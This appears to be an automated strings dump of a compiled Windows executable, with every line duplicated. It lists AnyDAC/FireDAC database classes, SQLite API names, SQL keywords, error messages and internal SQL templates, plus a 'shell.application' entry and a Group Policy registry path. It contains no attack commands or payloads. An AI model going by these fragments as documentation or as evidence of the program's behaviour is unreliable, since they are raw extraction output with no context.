TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished
TADCustomCommand.FetchFinished
TADCustomCommand.Fetch
TADCustomCommand.Fetch
TADCustomCommand.Fetch - Exception
TADCustomCommand.Fetch - Exception
TADDefaultLocalSQLAdapter
TADDefaultLocalSQLAdapter
Password must be not empty
Password must be not empty
Invalid password is specified or DB is corrupted
Invalid password is specified or DB is corrupted
Invalid password is specified
Invalid password is specified
Cipher: Password must be not empty
Cipher: Password must be not empty
Cipher: failed to change the DB password
Cipher: failed to change the DB password
;.ud3
;.ud3
~.SWj
~.SWj
~.CB3
~.CB3
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
#INDEXES
#INDEXES
#PRIMARYKEYS
#PRIMARYKEYS
#PRIMARYKEYFIELDS
#PRIMARYKEYFIELDS
#FOREIGNKEYS
#FOREIGNKEYS
#FOREIGNKEYFIELDS
#FOREIGNKEYFIELDS
PKEY_NAME
PKEY_NAME
FKEY_NAME
FKEY_NAME
PKEY_CATALOG_NAME
PKEY_CATALOG_NAME
PKEY_SCHEMA_NAME
PKEY_SCHEMA_NAME
PKEY_TABLE_NAME
PKEY_TABLE_NAME
PKEY_COLUMN_NAME
PKEY_COLUMN_NAME
RESULTSET_KEY
RESULTSET_KEY
RESULTSET_KEY =
RESULTSET_KEY =
ADDrivers.ini
ADDrivers.ini
Table Indexes (
Table Indexes (
Table PKeys (
Table PKeys (
Table PKey Fields (
Table PKey Fields (
Table FKeys (
Table FKeys (
Table FKey Fields (
Table FKey Fields (
foreign key name
foreign key name
ESQLiteNativeException
ESQLiteNativeException
TSQLiteExtension
TSQLiteExtension
TSQLiteExtensionManager
TSQLiteExtensionManager
TSQLiteValue
TSQLiteValue
TSQLiteFuncVar
TSQLiteFuncVar
TSQLiteInput
TSQLiteInput
TSQLiteInputs
TSQLiteInputs
TSQLiteOutput
TSQLiteOutput
TSQLiteFunction$Wo
TSQLiteFunction$Wo
TSQLiteFunctionData
TSQLiteFunctionData
TSQLiteExpressionFunction
TSQLiteExpressionFunction
uADPhysSQLiteWrapper
uADPhysSQLiteWrapper
TSQLiteExpressionFunctionData
TSQLiteExpressionFunctionData
sqlite3_libversion
sqlite3_libversion
sqlite3_libversion_number
sqlite3_libversion_number
sqlite3_compileoption_used
sqlite3_compileoption_used
sqlite3_compileoption_get
sqlite3_compileoption_get
sqlite3_initialize
sqlite3_initialize
sqlite3_shutdown
sqlite3_shutdown
sqlite3_close
sqlite3_close
sqlite3_errcode
sqlite3_errcode
sqlite3_errmsg
sqlite3_errmsg
sqlite3_extended_result_codes
sqlite3_extended_result_codes
sqlite3_open
sqlite3_open
sqlite3_open_v2
sqlite3_open_v2
sqlite3_key
sqlite3_key
sqlite3_rekey
sqlite3_rekey
sqlite3_trace
sqlite3_trace
sqlite3_profile
sqlite3_profile
sqlite3_busy_timeout
sqlite3_busy_timeout
sqlite3_get_autocommit
sqlite3_get_autocommit
sqlite3_set_authorizer
sqlite3_set_authorizer
sqlite3_update_hook
sqlite3_update_hook
sqlite3_limit
sqlite3_limit
sqlite3_changes
sqlite3_changes
sqlite3_total_changes
sqlite3_total_changes
sqlite3_interrupt
sqlite3_interrupt
sqlite3_last_insert_rowid
sqlite3_last_insert_rowid
sqlite3_enable_shared_cache
sqlite3_enable_shared_cache
sqlite3_release_memory
sqlite3_release_memory
sqlite3_soft_heap_limit
sqlite3_soft_heap_limit
sqlite3_status
sqlite3_status
sqlite3_malloc
sqlite3_malloc
sqlite3_memory_used
sqlite3_memory_used
sqlite3_memory_highwater
sqlite3_memory_highwater
sqlite3_prepare
sqlite3_prepare
sqlite3_finalize
sqlite3_finalize
sqlite3_step
sqlite3_step
sqlite3_reset
sqlite3_reset
sqlite3_column_count
sqlite3_column_count
sqlite3_column_type
sqlite3_column_type
sqlite3_column_name
sqlite3_column_name
sqlite3_column_database_name
sqlite3_column_database_name
sqlite3_column_table_name
sqlite3_column_table_name
sqlite3_column_origin_name
sqlite3_column_origin_name
sqlite3_column_decltype
sqlite3_column_decltype
sqlite3_column_blob
sqlite3_column_blob
sqlite3_column_double
sqlite3_column_double
sqlite3_column_int64
sqlite3_column_int64
sqlite3_column_text
sqlite3_column_text
sqlite3_column_bytes
sqlite3_column_bytes
sqlite3_clear_bindings
sqlite3_clear_bindings
sqlite3_bind_parameter_count
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_parameter_name
sqlite3_bind_blob
sqlite3_bind_blob
sqlite3_bind_double
sqlite3_bind_double
sqlite3_bind_int64
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_null
sqlite3_bind_text
sqlite3_bind_text
sqlite3_bind_value
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_bind_zeroblob
sqlite3_value_type
sqlite3_value_type
sqlite3_value_blob
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_bytes
sqlite3_value_double
sqlite3_value_double
sqlite3_value_int64
sqlite3_value_int64
sqlite3_value_text
sqlite3_value_text
sqlite3_result_blob
sqlite3_result_blob
sqlite3_result_double
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error
sqlite3_result_error_code
sqlite3_result_error_code
sqlite3_result_int64
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_null
sqlite3_result_text
sqlite3_result_text
sqlite3_result_zeroblob
sqlite3_result_zeroblob
sqlite3_create_collation
sqlite3_create_collation
sqlite3_create_function
sqlite3_create_function
sqlite3_user_data
sqlite3_user_data
sqlite3_enable_load_extension
sqlite3_enable_load_extension
sqlite3_load_extension
sqlite3_load_extension
sqlite3_free
sqlite3_free
sqlite3_table_column_metadata
sqlite3_table_column_metadata
sqlite3_progress_handler
sqlite3_progress_handler
sqlite3_declare_vtab
sqlite3_declare_vtab
sqlite3_create_module
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_create_module_v2
sqlite3_vfs_find
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_vfs_unregister
sqlite3_backup_init
sqlite3_backup_init
sqlite3_backup_step
sqlite3_backup_step
sqlite3_backup_finish
sqlite3_backup_finish
sqlite3_backup_remaining
sqlite3_backup_remaining
sqlite3_backup_pagecount
sqlite3_backup_pagecount
sqlite3_wal_hook
sqlite3_wal_hook
sqlite3_wal_autocheckpoint
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_wal_checkpoint
sqlite3_rtree_geometry_callback
sqlite3_rtree_geometry_callback
sqlite3_blob_open
sqlite3_blob_open
sqlite3_blob_close
sqlite3_blob_close
sqlite3_blob_bytes
sqlite3_blob_bytes
sqlite3_blob_read
sqlite3_blob_read
sqlite3_blob_write
sqlite3_blob_write
sqlite3_vtab_config
sqlite3_vtab_config
sqlite3_vtab_on_conflict
sqlite3_vtab_on_conflict
SQLITE_INTEGER
SQLITE_INTEGER
SQLITE_FLOAT
SQLITE_FLOAT
SQLITE_TEXT
SQLITE_TEXT
SQLITE_BLOB
SQLITE_BLOB
SQLITE_NULL
SQLITE_NULL
PRIMARY KEY must be unique
PRIMARY KEY must be unique
8.unj
8.unj
sqlite3
sqlite3
sqlite_version
sqlite_version
SQLiteNativeException
SQLiteNativeException
DriverID=SQLite
DriverID=SQLite
shell.application
shell.application
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{5A2BF78A-8DE6-4B43-8D7B-AD23782B0E74}User
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{5A2BF78A-8DE6-4B43-8D7B-AD23782B0E74}User
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%
P%S%V%Y%\%
P%S%V%Y%\%
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
inflate 1.0.4 Copyright 1995-1996 Mark Adler
inflate 1.0.4 Copyright 1995-1996 Mark Adler
8$4,8$4
8$4,8$4
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
3.7.15
3.7.15
SQLITE_
SQLITE_
d-d-d d:d:d
d-d-d d:d:d
d-d-d
d-d-d
failed to allocate %u bytes of memory
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
failed memory resize %u to %u bytes
922337203685477580
922337203685477580
API call with %s database connection pointer
API call with %s database connection pointer
RowKey
RowKey
GetProcessHeap
GetProcessHeap
OsError 0x%x (%u)
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
delayed %dms for lock/sharing conflict
%s-shm
%s-shm
%s\etilqs_
%s\etilqs_
%s\%s
%s\%s
Recovered %d frames from WAL file %s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
cannot limit WAL size: %s
SQLite format 3
SQLite format 3
invalid page number %d
invalid page number %d
2nd reference to page %d
2nd reference to page %d
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
failed to get page %d
failed to get page %d
freelist leaf count too big on page %d
freelist leaf count too big on page %d
Page %d:
Page %d:
unable to get the page. error code=%d
unable to get the page. error code=%d
btreeInitPage() returns error code %d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On tree page %d cell %d:
On page %d at right child:
On page %d at right child:
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Page %d is never used
Pointer map page %d is referenced
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
unknown database %s
unknown database %s
keyinfo(%d
keyinfo(%d
%s(%d)
%s(%d)
%s-mjXXXXXX9XXz
%s-mjXXXXXX9XXz
MJ delete: %s
MJ delete: %s
MJ collide: %s
MJ collide: %s
-mjX9X
-mjX9X
foreign key constraint failed
foreign key constraint failed
unable to use function %s in the requested context
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
zeroblob(%d)
zeroblob(%d)
abort at %d in [%s]: %s
abort at %d in [%s]: %s
constraint failed at %d in [%s]
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
no such savepoint: %s
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_temp_master
sqlite_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
database table is locked: %s
database table is locked: %s
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open value of type %s
cannot open virtual table: %s
cannot open virtual table: %s
cannot open view: %s
cannot open view: %s
no such column: "%s"
no such column: "%s"
foreign key
foreign key
indexed
indexed
cannot open %s column for writing
cannot open %s column for writing
misuse of aliased aggregate %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s.%s
%s: %s.%s
%s: %s.%s
not authorized to use function: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
too many SQL variables
too many SQL variables
too many columns in %s
too many columns in %s
EXECUTE %s%s SUBQUERY %d
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
misuse of aggregate: %s()
%.*s"%w"%s
%.*s"%w"%s
%s%.*s"%w"
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_parent
sqlite_rename_parent
%s OR name=%Q
%s OR name=%Q
type='trigger' AND (%s)
type='trigger' AND (%s)
sqlite_
sqlite_
table %s may not be altered
table %s may not be altered
there is already another table or index with this name: %s
there is already another table or index with this name: %s
view %s may not be altered
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_altertab_%s
sqlite_stat1
sqlite_stat1
sqlite_stat3
sqlite_stat3
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
DELETE FROM %Q.%s WHERE %s=%Q
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
invalid name: "%s"
too many attached databases - max %d
too many attached databases - max %d
database %s is already in use
database %s is already in use
Invalid key value
Invalid key value
unable to open database: %s
unable to open database: %s
no such database: %s
no such database: %s
cannot detach database %s
cannot detach database %s
database %s is locked
database %s is locked
sqlite_detach
sqlite_detach
sqlite_attach
sqlite_attach
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
object name reserved for internal use: %s
there is already an index named %s
there is already an index named %s
too many columns on %s
too many columns on %s
duplicate column name: %s
duplicate column name: %s
default value of column [%s] is not constant
default value of column [%s] is not constant
table "%s" has more than one primary key
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
sqlite_stat
table %s may not be dropped
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
indexed columns are not unique
indexed columns are not unique
table %s may not be indexed
table %s may not be indexed
views may not be indexed
views may not be indexed
virtual tables may not be indexed
virtual tables may not be indexed
there is already a table named %s
there is already a table named %s
index %s already exists
index %s already exists
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
table %s has no column named %s
table %s has no column named %s
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
a JOIN clause is required before %s
unable to identify the object to be reindexed
unable to identify the object to be reindexed
no such collation sequence: %s
no such collation sequence: %s
table %s may not be modified
table %s may not be modified
cannot modify %s because it is a view
cannot modify %s because it is a view
sqlite_source_id
sqlite_source_id
sqlite_log
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_used
sqlite_compileoption_get
sqlite_compileoption_get
foreign key mismatch
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
%d values for %d columns
%d values for %d columns
table %S has no column named %s
table %S has no column named %s
%s.%s may not be NULL
%s.%s may not be NULL
constraint %s failed
constraint %s failed
automatic extension loading failed: %s
automatic extension loading failed: %s
foreign_keys
foreign_keys
foreign_key_list
foreign_key_list
*** in database %s ***
*** in database %s ***
unsupported encoding: %s
unsupported encoding: %s
rekey
rekey
hexkey
hexkey
hexrekey
hexrekey
malformed database schema (%s)
malformed database schema (%s)
%s - %s
%s - %s
unsupported file format
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
%s:%d
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
no such index: %s
sqlite_subquery_%p_
sqlite_subquery_%p_
no such table: %s
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
no such trigger: %S
-- TRIGGER %s
-- TRIGGER %s
no such column: %s
no such column: %s
cannot VACUUM - SQL statements in progress
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
